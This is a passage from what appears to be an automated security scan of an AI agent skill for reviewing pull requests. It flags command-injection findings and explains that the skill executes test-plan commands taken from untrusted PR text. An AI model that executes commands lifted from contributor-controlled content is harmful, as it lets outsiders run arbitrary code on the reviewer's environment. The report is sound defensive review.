review-pr

[Skill Scanner] Backtick command substitution detected All findings: [HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4] [HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4] The skill's stated purpose (automated PR review + executing test-plan steps) aligns with the capabilities described (reading PRs, diffs, posting reviews). However, the practice of automatically executing commands extracted from the PR body is a high-risk behavior: it allows untrusted PR authors to run arbitrary commands on the reviewer's environment. There are no described safeguards, sandboxing, or whitelisting to limit dangerous actions. Therefore the skill is SUSPICIOUS — its core capability (running the test plan) is reasonable in trusted environments but inappropriate to automate without strict safeguards. Use only in strongly controlled/sandboxed environments and require explicit human confirmation for executing unknown test-plan commands. LLM verification: The skill's stated purpose (automate PR review, run a PR's test plan, post review comments, and merge) is internally consistent with the provided gh/git commands. The main security concern is that it directs execution of arbitrary commands taken directly from the PR body (the `## Test plan`) on the runner. Because PR content is contributor-controlled, executing those commands without sandboxing, command whitelisting, or explicit human approval creates a high-risk data-flow from untrusted input t